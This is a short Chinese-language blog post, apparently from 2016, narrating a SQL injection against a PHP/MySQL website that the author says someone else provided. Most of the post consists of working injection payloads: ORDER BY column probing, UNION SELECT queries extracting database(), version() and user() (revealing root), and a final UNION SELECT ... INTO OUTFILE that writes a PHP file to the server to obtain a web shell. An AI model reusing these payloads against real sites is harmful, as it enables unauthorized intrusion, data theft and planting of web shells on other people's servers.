网站入侵检测记一次PHP+mysql注入点直接写shell
2016-07-15 08:34:04   来源:   评论:0 点击:

网站入侵检测记一次PHP+mysql注入点直接写shell


and 1=2直接报错出了路径,这回我打码了,毕竟站是别人给的然后order by 26返回正常order by 27返回错误于是我们UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26没报错

然后在wid=这里加一个-报错爆出 7 和10然后开始查询user()和database()这时候我看到了了不得的东西UNION SELECT 1,2,3,4,5,6,database(),version(),9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26root!!!

然后就Happy了直接UNION SELECT 1,2,3,4,5,6,'',version(),9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile 'D:\\xxxxx\\xx.php'成功getsehll

相关热词搜索:入侵检测 网站

上一篇:跨站式脚本(Cross-SiteScripting)XSS攻击原理分析
下一篇:最后一页

分享到: 收藏